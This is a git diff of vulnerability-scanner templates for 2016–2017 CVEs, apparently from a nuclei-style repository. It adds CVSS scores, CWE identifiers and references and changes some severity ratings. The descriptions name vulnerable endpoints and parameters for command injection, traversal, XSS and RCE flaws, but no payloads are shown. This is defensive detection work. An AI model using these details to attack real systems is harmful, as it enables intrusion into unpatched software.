https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html tags: wordpress,cve,cve2016,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 4134b4a8b4..e70c75ed3a 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -9,6 +9,11 @@ info: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 tags: cve,cve2016,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-10956 + cwe-id: CWE-20 requests: - method: GET diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 9f3466faaa..7d70ef5104 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -3,13 +3,18 @@ id: CVE-2016-10960 info: name: wSecure Lite < 2.4 - Remote Code Execution (RCE) author: daffainfo - severity: critical + severity: high description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. reference: - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-10960 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index 5dcf8191cd..0f3716e9fe 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -8,6 +8,12 @@ info: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 tags: cve,cve2016,wordpress,wp-theme,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2016-10993 + cwe-id: CWE-79 + description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." requests: - method: GET diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml index 639320dfc8..8111ac538d 100644 --- a/cves/2016/CVE-2016-2004.yaml +++ b/cves/2016/CVE-2016-2004.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.exploit-db.com/exploits/39858 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-2004 + cwe-id: CWE-306 network: - inputs: diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml index a65ee5deea..364e21e9ba 100644 --- a/cves/2016/CVE-2016-2389.yaml +++ b/cves/2016/CVE-2016-2389.yaml @@ -9,6 +9,11 @@ info: - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://www.cvedetails.com/cve/CVE-2016-2389 tags: cve,cve2016,lfi,sap + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-2389 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 26b9577ef4..86662795dc 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -10,6 +10,11 @@ info: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html tags: cve,cve2016,struts,rce,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2016-3081 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 2238126a04..40868caf7e 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -7,6 +7,11 @@ info: description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-5649 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 964fdfed40..fddddf2586 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -3,12 +3,17 @@ id: CVE-2016-6277 info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu - severity: critical + severity: high description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2016-6277 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml index 686d2c2635..0e56752878 100644 --- a/cves/2016/CVE-2016-7552.yaml +++ b/cves/2016/CVE-2016-7552.yaml @@ -7,6 +7,11 @@ info: description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 tags: cve,cve2016,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-7552 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml index 9f543433f5..a15b21c00b 100644 --- a/cves/2016/CVE-2016-7981.yaml +++ b/cves/2016/CVE-2016-7981.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 tags: cve,cve2016,xss,spip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-7981 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index 7dc6d15282..c1eb936feb 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -7,6 +7,11 @@ info: description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request. reference: https://www.exploit-db.com/exploits/45196 tags: cve,cve2017,oracle,glassfish,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000028 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index cb3e001dd0..ef6415afce 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal tags: cve,cve2017,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 requests: - method: POST diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 16dc0d9801..d7a07c5e57 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -11,6 +11,11 @@ info: - https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html - https://nvd.nist.gov/vuln/detail/CVE-2017-1000486 tags: cve,cve2017,primetek,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-1000486 + cwe-id: CWE-326 requests: - raw: diff --git a/cves/2017/CVE-2017-10075.yaml b/cves/2017/CVE-2017-10075.yaml index 34dde57e91..d7eb8e1003 100644 --- a/cves/2017/CVE-2017-10075.yaml +++ b/cves/2017/CVE-2017-10075.yaml @@ -3,10 +3,14 @@ id: CVE-2017-10075 info: name: Oracle Content Server XSS author: madrobot - severity: medium + severity: high description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site. reference: http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html tags: cve,cve2017,xss,oracle + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2017-10075 requests: - method: GET diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 26de578c10..1e9b5d37af 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -9,6 +9,10 @@ info: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc tags: cve,cve2017,rce,oracle,weblogic + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2017-10271 requests: - raw: diff --git a/cves/2017/CVE-2017-11444.yaml b/cves/2017/CVE-2017-11444.yaml index 0af1f0dba3..324b2e11ac 100644 --- a/cves/2017/CVE-2017-11444.yaml +++ b/cves/2017/CVE-2017-11444.yaml @@ -3,12 +3,17 @@ id: CVE-2017-11444 info: name: Subrion CMS SQL Injection author: dwisiswant0 - severity: high + severity: critical description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array. reference: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q tags: cve,cve2017,sqli,subrion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-11444 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml index fd2fd2781a..8ead0e5c2a 100755 --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -10,6 +10,11 @@ info: - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 tags: cve,cve2017,java,rce,deserialization + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12149 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index da7a45c350..e6b40b0d91 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 tags: cve,cve2017,ilo4,hpe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-12542 requests: - method: GET diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index ae2639eebb..d4f8d1050e 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -7,6 +7,11 @@ info: description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. reference: https://struts.apache.org/docs/s2-053.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12611 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index e78786d62d..2c16f2c1fe 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -3,7 +3,7 @@ id: CVE-2017-12615 info: name: Apache Tomcat RCE author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,apache,rce reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | @@ -11,6 +11,11 @@ info: This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-12615 + cwe-id: CWE-434 requests: - method: PUT diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index f9f543a9b9..653122ae26 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -10,6 +10,12 @@ info: - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12629 + cwe-id: CWE-611 + description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr." requests: - raw: diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 5565f23393..7e7edb5586 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -3,10 +3,15 @@ id: CVE-2017-12635 info: name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation author: pikpikcu - severity: high + severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. reference: https://github.com/assalielmehdi/CVE-2017-12635 tags: cve,cve2017,couchdb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12635 + cwe-id: CWE-269 requests: - raw: diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index 46cbdb8d04..905e10391a 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -10,6 +10,11 @@ info: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-12637 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index 56d43089ee..ad1ea847cc 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -10,6 +10,11 @@ info: description: | In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. tags: xss,django,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 6a91a097cf..a9b3be6385 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -8,6 +8,12 @@ info: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." requests: - raw: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 9772411357..03689a2002 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2017-14537 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml index 763aeee7c4..91fc63e9f3 100644 --- a/cves/2017/CVE-2017-14651.yaml +++ b/cves/2017/CVE-2017-14651.yaml @@ -6,6 +6,15 @@ info: severity: medium description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. tags: cve,cve2017,wso2,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.80 + cve-id: CVE-2017-14651 + cwe-id: CWE-79 + reference: + - https://github.com/cybersecurityworks/Disclosed/issues/15 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 + - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html requests: - method: GET diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml index 184da5d96f..6a386ab381 100644 --- a/cves/2017/CVE-2017-14849.yaml +++ b/cves/2017/CVE-2017-14849.yaml @@ -6,6 +6,15 @@ info: severity: high description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. tags: cve,cve2017,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + reference: + - https://twitter.com/nodejs/status/913131152868876288 + - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ + - http://www.securityfocus.com/bid/101056 requests: - method: GET diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index 5102cbacf4..57a6eda186 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml @@ -3,12 +3,17 @@ id: CVE-2017-15647 info: name: FiberHome - Directory Traversal author: daffainfo - severity: medium + severity: high description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 - https://www.cvedetails.com/cve/CVE-2017-15647 tags: cve,cve2017,lfi,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 2de5b8d83a..2a2853e552 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-15715 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index f68fcd4a77..41f4f5c82f 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -7,8 +7,12 @@ info: reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - severity: high + severity: critical tags: cve,cve2017,rce,vpn,paloalto,globalprotect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-15944 requests: - raw: diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index ef7744125e..e4057dae37 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml @@ -6,6 +6,12 @@ info: reference: https://www.exploit-db.com/exploits/43141 severity: high tags: cve,cve2017,ulterius,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16806 + cwe-id: CWE-22 + description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." requests: - method: GET diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index 6af9898153..ed8c14a5be 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -7,6 +7,11 @@ info: description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information. reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 tags: cve,cve2017,nextjs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16877 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 8dab040905..9eb08d7a3a 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -7,6 +7,11 @@ info: description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 10ad0d299d..5fcc0923df 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -9,6 +9,11 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17059 + cwe-id: CWE-79 requests: - method: POST diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 9a2c3bce2f..2cd0371034 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -7,6 +7,11 @@ info: description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index ab048ea172..0f87ecde9f 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -10,6 +10,11 @@ info: - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 severity: high tags: cve,cve2017,rce,embedthis,goahead,fuzz + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-17562 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 9388b6bf6c..89de79241d 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -11,6 +11,11 @@ info: description: | AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. tags: cve,cve2017,xss,avantfax + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18024 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 7bed4c11c3..4f60e9dca3 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -7,6 +7,11 @@ info: description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18536 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index fc7f16e8cc..8c240d1426 100644 --- 